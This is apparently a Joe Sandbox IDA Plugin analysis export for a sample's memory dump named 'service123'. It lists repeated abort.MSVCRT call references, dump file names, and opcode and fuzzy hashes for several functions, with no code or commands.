abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 200e9a73312d3f87fea9632602c5334d56619656ede47a62c5b7b1cdf19404ed
Instruction ID: ff54fc4128e5d00628cd07634a1a37de9036bf581e58942f6192a207665e550c
Opcode Fuzzy Hash: 200e9a73312d3f87fea9632602c5334d56619656ede47a62c5b7b1cdf19404ed
Instruction Fuzzy Hash: 000128B2641201CFE704FF2CD895B69B7B0FB11309F019A48C594DBA11D735E868CF96

Function 6C2F28BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 7afce2a6b0191c256b459c35670e486b737089f2aeedad9e55286805b92949e1
Instruction ID: 567de08095962f482c413778146bc86c71c18ad87bf4700f071c42b274e330e8
Opcode Fuzzy Hash: 7afce2a6b0191c256b459c35670e486b737089f2aeedad9e55286805b92949e1
Instruction Fuzzy Hash: A40137B2642205CBE708FF1CD4D5B6AB7B0FB12309F019A58C5959BB01CB35E869CF96

Function 6C2F2A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ce8802b6f62769a3893204c0d6abc7279cfb1693ad9a9cedc4870dab8a053352
Instruction ID: 9c1dc9b89d53716d68fe2b1330930495fd3c5f359e48f07f206dc7a7915bd82b
Opcode Fuzzy Hash: ce8802b6f62769a3893204c0d6abc7279cfb1693ad9a9cedc4870dab8a053352
Instruction Fuzzy Hash: A90149B2681205CBE704FF18D4D5B6AB7B0FB12308F019A48C4949BB05C735E868CF96

Function 6C2F2B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 0dfe33eae8d8001fb068ac47314265891b795ea15ef37ce82d6bc7a4c689d943
Instruction ID: c0d1936149906a4b2317f6d2673ae7bd1944aab6472ad64923a082988bf869a5
Opcode Fuzzy Hash: 0dfe33eae8d8001fb068ac47314265891b795ea15ef37ce82d6bc7a4c689d943
Instruction Fuzzy Hash: 4FF067B2645206CBD704EF18D4D5BAAB7B0FF12308F019A48C4949BB02C775E868CF92

Function 6C2F2AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43a64e3fdf855baa7cf450d3b127b6359de1c10fe8e0e5b4ff0b83fcdcf41e33
Instruction ID: ccabaa6da9851a61c4587a40646eae1877b118b4f416aaab4d27eb2dd458784f
Opcode Fuzzy Hash: 43a64e3fdf855baa7cf450d3b127b6359de1c10fe8e0e5b4ff0b83fcdcf41e33
Instruction Fuzzy Hash: 41F03AB26452068BD744EF18C095BAAF770FF02308F019958C8559BA06DB75E869CF96

Function 6C2FB930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bdf0de7df7b8e5df4819fccba645af2ea1e1d0a0b51a7b85ccb25308987a867f
Instruction ID: 831fd313ca087384aef0057b9fdca983e7df3b9ebf7ba6e9220733939a5e87dd
Opcode Fuzzy Hash: bdf0de7df7b8e5df4819fccba645af2ea1e1d0a0b51a7b85ccb25308987a867f
Instruction Fuzzy Hash: BA31F23128970D9FC700DE59C49179AF3B6EB89315F40892AEEB487B41D334AC5A9F52

Function 6C2FBFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 327db2a598a63545a2d7f52fddd600921c24997b904dae5f253e9dee56bcd25d
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: 45F027316DC12FCA87202E1C84108A6F3377657B0DF994445ECA06BE18C2129847CB43

Function 6C2FBEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a926862fe869e12fe3f81bd53aac037b41d59a3e0d3e1a5b9a8e1af2a3c1831b
Instruction ID: 7e3e62fcb6e704fc3a882ec77957e0eb31b82f7135eda0c7e6026216c6b12685
Opcode Fuzzy Hash: a926862fe869e12fe3f81bd53aac037b41d59a3e0d3e1a5b9a8e1af2a3c1831b
Instruction Fuzzy Hash: 4F016173B95B1E07F3104E74C4D1361F6925B82318F098769ED7517E86C134980A9B40

Function 6C2FBC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
